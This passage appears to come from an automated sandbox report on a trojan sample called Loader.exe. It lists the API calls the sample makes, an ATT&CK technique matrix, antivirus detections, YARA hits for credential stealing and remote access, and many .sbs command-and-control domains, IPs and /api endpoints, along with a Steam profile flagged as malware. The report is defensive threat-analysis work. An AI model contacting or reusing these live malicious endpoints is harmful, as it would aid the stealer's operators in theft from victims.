    Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_001ACC05
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_001ACCD4
    Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,0_2_001A3366
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,0_2_001A3810
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,2_2_001A3810
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,2_2_001AC9D6
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_001ACAFF
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,2_2_001AC370
    Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,2_2_001A3366
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,2_2_001ACC05
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_001ACCD4
    Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,2_2_001AC612
    Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,2_2_001AC65D
    Source: C:\Users\user\Desktop\Loader.exeCode function: EnumSystemLocalesW,2_2_001AC6F8
    Source: C:\Users\user\Desktop\Loader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_001AC783
    Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_00197402 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00197402
    Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
    Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    111
    Process Injection
    2
    Virtualization/Sandbox Evasion
    OS Credential Dumping1
    System Time Discovery
    Remote Services1
    Archive Collected Data
    11
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts2
    Command and Scripting Interpreter
    Boot or Logon Initialization Scripts1
    DLL Side-Loading
    111
    Process Injection
    LSASS Memory1
    Query Registry
    Remote Desktop Protocol2
    Clipboard Data
    1
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Native API
    Logon Script (Windows)Logon Script (Windows)11
    Deobfuscate/Decode Files or Information
    Security Account Manager41
    Security Software Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts1
    PowerShell
    Login HookLogin Hook3
    Obfuscated Files or Information
    NTDS2
    Virtualization/Sandbox Evasion
    Distributed Component Object ModelInput Capture114
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Software Packing
    LSA Secrets1
    Account Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Loader.exe42%ReversingLabsWin32.Trojan.CrypterX
    Loader.exe41%VirustotalBrowse
    Loader.exe100%AviraHEUR/AGEN.1361748
    Loader.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    condifendteu.sbs0%VirustotalBrowse
    steamcommunity.com0%VirustotalBrowse
    vennurviot.sbs17%VirustotalBrowse
    drawwyobstacw.sbs0%VirustotalBrowse
    mathcucom.sbs0%VirustotalBrowse
    enlargkiw.sbs0%VirustotalBrowse
    allocatinow.sbs0%VirustotalBrowse
    resinedyw.sbs0%VirustotalBrowse
    ehticsprocw.sbs0%VirustotalBrowse
    sergei-esenin.com18%VirustotalBrowse
    widdensmoywi.sbs0%VirustotalBrowse
    SourceDetectionScannerLabelLink
    https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
    http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&0%URL Reputationsafe
    https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
    https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english0%URL Reputationsafe
    http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://store.steampowered.com/points/shop/0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
    https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
    https://store.steampowered.com/about/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english0%URL Reputationsafe
    https://help.steampowered.com/en/0%URL Reputationsafe
    https://store.steampowered.com/news/0%URL Reputationsafe
    http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english0%URL Reputationsafe
    http://store.steampowered.com/account/cookiepreferences/0%URL Reputationsafe
    https://store.steampowered.com/mobile0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl0%URL Reputationsafe
    https://steamcommunity.com/profiles/76561199724331900/badges100%URL Reputationmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    condifendteu.sbs
    104.21.79.35
    truetrueunknown
    steamcommunity.com
    104.102.49.254
    truetrueunknown
    vennurviot.sbs
    172.67.140.193
    truetrueunknown
    drawwyobstacw.sbs
    188.114.96.3
    truetrueunknown
    mathcucom.sbs
    188.114.96.3
    truetrueunknown
    widdensmoywi.sbs
    104.21.8.37
    truetrueunknown
    sergei-esenin.com
    172.67.206.204
    truetrueunknown
    ehticsprocw.sbs
    172.67.173.224
    truetrueunknown
    resinedyw.sbs
    172.67.205.156
    truetrueunknown
    enlargkiw.sbs
    104.21.33.249
    truetrueunknown
    allocatinow.sbs
    unknown
    unknowntrueunknown
    NameMaliciousAntivirus DetectionReputation
    enlargkiw.sbstrue
      unknown
      allocatinow.sbstrue
        unknown
        drawwyobstacw.sbstrue
          unknown
          https://widdensmoywi.sbs/apitrue
            unknown
            mathcucom.sbstrue
              unknown
              https://steamcommunity.com/profiles/76561199724331900true
              • URL Reputation: malware
              unknown
              https://vennurviot.sbs/apitrue
                unknown
                ehticsprocw.sbstrue
                  unknown
                  condifendteu.sbstrue
                    unknown
                    https://drawwyobstacw.sbs/apitrue
                      unknown
                      widdensmoywi.sbstrue
                        unknown
                        https://resinedyw.sbs/apitrue
                          unknown
                          https://mathcucom.sbs/apitrue
                            unknown
                            resinedyw.sbstrue
                              unknown
                              vennurviot.sbstrue
                                unknown
                                https://condifendteu.sbs/apitrue
                                  unknown
                                  https://enlargkiw.sbs/apitrue
                                    unknown
                                    https://sergei-esenin.com/apitrue
                                      unknown
                                      https://ehticsprocw.sbs/apitrue
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.cloudflare.com/learning/access-management/phishing-attack/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://steamcommunity.com/?subsection=broadcastsLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://sergei-esenin.com/Loader.exe, 00000003.00000002.2304373806.0000000000D07000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://store.steampowered.com/subscriber_agreement/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://resinedyw.sbs/vLoader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  http://www.valvesoftware.com/legal.htmLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://resinedyw.sbs/1w#ULoader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://allocatinow.sbs/piPLoader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPiLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://enlargkiw.sbs/apibs-Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://store.steampowered.com/privacy_agreement/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://store.steampowered.com/points/shop/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://enlargkiw.sbs/Loader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://steamcommunity.com/profiles/76561199724331900/inventory/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • URL Reputation: malware
                                                            unknown
                                                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://store.steampowered.com/privacy_agreement/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.cloudflare.com/5xx-error-landingLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&aLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://mathcucom.sbs/Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://avatars.akamai.steamstaticLoader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://store.steampowered.com/about/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://steamcommunity.com/my/wishlist/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://enlargkiw.sbs/api%ULoader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2178802585.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://enlargkiw.sbs/1w#ULoader.exe, 00000003.00000003.2178667434.0000000000D46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://help.steampowered.com/en/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://steamcommunity.com/market/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://store.steampowered.com/news/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://store.steampowered.com/subscriber_agreement/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://allocatinow.sbs/apiLoader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://steamcommunity.com/discussions/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://store.steampowered.com/stats/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://store.steampowered.com/steam_refunds/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://resinedyw.sbs/Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&l=eLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://resinedyw.sbs/api%ULoader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://resinedyw.sbs/api(Loader.exe, 00000003.00000003.2188377647.0000000000D46000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://steamcommunity.com/workshop/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://mathcucom.sbs/api4Loader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://store.steampowered.com/legal/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2249637998.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=englLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://allocatinow.sbs/apisLoader.exe, 00000003.00000003.2169209036.0000000000D4F000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000003.00000003.2168816833.0000000000D4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://store.steampowered.com/Loader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwLoader.exe, 00000003.00000003.2249637998.0000000000DE9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
